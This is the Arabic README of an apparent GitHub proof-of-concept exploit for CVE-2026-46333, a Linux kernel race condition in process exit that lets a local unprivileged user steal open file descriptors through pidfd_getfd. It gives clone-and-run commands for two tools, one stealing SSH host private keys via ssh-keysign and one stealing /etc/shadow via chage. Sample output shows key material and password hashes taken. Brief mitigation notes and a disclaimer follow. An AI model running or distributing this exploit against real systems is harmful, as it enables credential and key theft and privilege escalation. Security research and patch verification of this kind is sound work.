
CVE-2026-46333
إثبات المفهوم عالي الجودة لثغرة سباق (race condition) في نواة لينكس
إثبات مفهوم نظيف وموثوق لـ CVE-2026-46333 — كشف معلومات محلي عبر سباق (race condition) في مسار خروج العمليات (process exit) لنواة لينكس.
سرقة ناجحة للمفتاح الخاص لـ SSH host ولـ /etc/shadow على Kali Linux
CVE-2026-46333 (تُعرف أيضًا بـ ssh-keysign-pwn) هي ثغرة سباق (race condition) في منطق ptrace وخروج العمليات في نواة لينكس (do_exit() → exit_mm() قبل exit_files()).
عندما تكون قيمة mm == NULL لعملية مميزة (privileged process) (مثل SUID ssh-keysign أو chage) أثناء الخروج، يتم تجاوز فحص القابلية للتفريغ (dumpability check)، مما يسمح لمهاجم محلي غير مميز باستخدام pidfd_getfd() لسرقة واصفات الملفات المفتوحة.
التأثير:
/etc/ssh/ssh_host_*_key)/etc/shadowمكتشفة بواسطة: Qualys
تم إصلاحها في: إيداع (commit) النواة 31e62c2ebbfdc3fe3dbdf5e02c92a9dc67087a3a (مايو 2026)
/etc/shadow عبر chagegit clone https://github.com/0xBlackash/CVE-2026-46333.git
cd CVE-2026-46333
sudo ./CVE-2026-46333
sudo ./CVE-2026-46333-shadow
| الملف | الوصف |
|---|---|
cve-2026-46333.c | سارق المفاتيح الخاصة لـ SSH host |
cve-2026-46333-shadow.c | سارق /etc/shadow عبر chage |
README.md | هذا الملف |
سارق مفتاح SSH:
[+] SUCCESS! Stolen fd 3 -> /etc/ssh/ssh_host_ecdsa_key (round 0)
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAAB...
سارق Shadow:
[+] SUCCESS! Stolen /etc/shadow (round 0)
root:*:19953:0:99999:7:::
kali:$y$j9T$zY1oKFxJlTgP2WcJhzbNl1$...
31e62c2ebbfd...EnableSSHKeysign في sshd_config إذا لم يكن ضروريًاهذا الاستغلال هو لأغراض تعليمية وبحثية أمنية فقط.
استخدمه فقط على أنظمة تمتلكها أو لديك إذن كتابي صريح لاختبارها.
المؤلف غير مسؤول عن أي استخدام خاطئ أو ضرر.
هذا المشروع مرخص بموجب رخصة MIT — لا تتردد في الاستخدام والتعديل والتوزيع.
صنع بـ ❤️ لمجتمع الأمن
الحفاظ على الأنظمة محدثة هو أفضل دفاع.